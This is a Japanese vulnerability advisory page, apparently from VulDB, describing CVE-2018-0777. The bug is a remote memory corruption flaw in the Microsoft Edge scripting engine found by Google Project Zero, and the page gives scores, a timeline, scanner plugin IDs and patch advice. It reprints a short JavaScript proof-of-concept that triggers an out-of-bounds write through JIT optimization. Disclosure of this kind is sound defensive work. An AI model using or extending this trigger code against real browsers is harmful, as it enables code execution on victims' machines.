Microsoft Edge Scripting Engine Object メモリ破損

CVSS 一時的なメタスコア現在のエクスプロイト価格 (≈)CTI注目指数
5.4$0-$5k0.00

重大 として分類されている脆弱性が Microsoft Edge 内に見つかりました。 影響を受けるのは、コンポーネント【Scripting Engine】の未知の関数です。 未知の値でObjectの一部として攻撃することが、 メモリ破損を突く攻撃に繋がります。 この問題をCWEでは、CWE-119 と定義しました。 このバグは 2018年01月03日に発見されました。 この脆弱性は 2018年01月03日に Google Project Zeroの lokihardtより「Website」の Security Update Guideにて 紹介されました。 アドバイザリーは portal.msrc.microsoft.com にてダウンロード用に公開されています。

この脆弱性は CVE-2018-0777 として知られています。 CVEの割り当ては 2017年12月01日 に行われました。 攻撃はリモートで開始される可能性があります。 入手できる技術的詳細情報はありません。 さらに、入手できるエクスプロイトツールが存在します。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 エクスプロイトツールの現在の価格はおそらく米ドルで約$0-$5kです。 アドバイザリーは次を指摘しています。

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

このエクスプロイトツールは proof-of-concept として宣言されています。 エクスプロイトツールは exploit-db.com にダウンロードのために共有されています。 0dayとして、推定される闇市場取引価格はおよそ $25k-$100k でした。 エクスプロイトツールには下記のコードが含まれています。

function opt(arr, start, end) {
    for (let i = start; i < end; i++) {
        if (i === 10) {
            i += 0;  // <<-- (a)
        }
        arr[i] = 2.3023e-320;
    }
}
 
function main() {
    let arr = new Array(100);
    arr.fill(1.1);
 
    for (let i = 0; i < 1000; i++)
        opt(arr, 0, 3);
 
    opt(arr, 0, 100000);
}
 
main();
脆弱性スキャナーNessusはID【105547 (KB4056888: Windows 10 Version 1511 January 2018 Security Update (Meltdown)(Spectre))】のプラグインを提供しています。ターゲット環境における不具合の有無を判定するのに役立ちます。 これは分類【Windows : Microsoft Bulletins 】に割り振られています。 プラグインはタイプ【 l 】のコンテキストで実行されています。 商用脆弱性スキャナーQualysではプラグイン【 91425 (Microsoft Edge Security Update for January 2018 (ADV180002) (Spectre/Meltdown)) 】を使用してこの問題をテストできます。

この問題を修正するために、パッチの適用を推奨します。 考えられる回避策が、すぐにとして脆弱性の公開後公表されました 。

脆弱性は「SecurityFocus (BID 102402) , Tenable (105547)」等の脆弱性データベースにも文書化されています。

製品情報

タイプ

ベンダー

名前

ライセンス

CPE 2.3情報

CPE 2.2情報

CVSSv4情報

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB 方向性: 🔍
VulDB 信頼性: 🔍

CVSSv3情報

VulDB ベースメタスコア: 6.0
VulDB 一時的なメタスコア: 5.8

VulDB ベーススコア: 6.3
VulDB 一時的なスコア: 5.7
VulDB 方向性: 🔍
VulDB 信頼性: 🔍

ベンダー ベーススコア (Microsoft): 4.2
ベンダー Vector (Microsoft): 🔍

NVD ベーススコア: 7.5
NVD 方向性: 🔍

CVSSv2情報

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
方向性複雑度認証守秘義務性誠実性可用性
解除解除解除解除解除解除
解除解除解除解除解除解除
解除解除解除解除解除解除

VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍

NVD ベーススコア: 🔍

悪用する情報

クラス: メモリ破損
CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍

ローカル: いいえ
リモート: はい

可用性: 🔍
アクセス: パブリック
ステータス: Proof-of-Concept
作成者: Google Security Research
ダウンロード: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

価格予測: 🔍
現在の価格評価: 🔍

0-Day解除解除解除解除
本日解除解除解除解除

Nessus ID: 105547
Nessus 名前: KB4056888: Windows 10 Version 1511 January 2018 Security Update (Meltdown)(Spectre)
Nessus ファイル: 🔍
Nessus リスク: 🔍
Nessus ファミリー: 🔍
Nessus Context: 🔍

OpenVAS ID: 870324
OpenVAS 名前: Microsoft Windows Multiple Vulnerabilities (KB4056892)
OpenVAS ファイル: 🔍
OpenVAS ファミリー: 🔍

Qualys ID: 🔍
Qualys 名前: 🔍

Exploit-DB: 🔍

脅威インテリジェンス情報

関心: 🔍
アクティブ アクター: 🔍
アクティブな APT グループ: 🔍

対策情報

推奨: パッチ
ステータス: 🔍

リアクション時間: 🔍
0day日時: 🔍
暴露日時: 🔍
エクスプロイト遅延日時: 🔍

タイムライン情報

2017年12月01日 🔍
2018年01月03日 +33 日 🔍
2018年01月03日 +0 日 🔍
2018年01月03日 +0 日 🔍
2018年01月03日 +0 日 🔍
2018年01月04日 +1 日 🔍
2018年01月04日 +0 日 🔍
2018年01月05日 +1 日 🔍
2018年01月17日 +12 日 🔍
2018年01月17日 +0 日 🔍
2021年01月28日 +1107 日 🔍

ソース情報

ベンダー: microsoft.com

アドバイザリー: portal.msrc.microsoft.com
調査者: Lokihardt (lokihardt)
組織: Google Project Zero
ステータス: 確認済み
確認: 🔍

CVE: CVE-2018-0777 (🔍)
OVAL: 🔍

SecurityTracker: 1040100
SecurityFocus: 102402 - Microsoft Edge Scripting Engine CVE-2018-0777 Remote Memory Corruption Vulnerability

scip Labs: https://www.scip.ch/en/?labs.20161013
関連情報: : 🔍

エントリ情報

作成済み: 2018年01月05日 10:06
更新済み: 2021年01月28日 16:08
変更: 2018年01月05日 10:06 (96), 2019年12月28日 17:16 (6), 2021年01月28日 16:02 (2), 2021年01月28日 16:08 (1)
完了: 🔍

討論

コメントはまだありません。 言語: ja + en.

コメントするにはログインしてください。

Interested in the pricing of exploits?

See the underground prices here!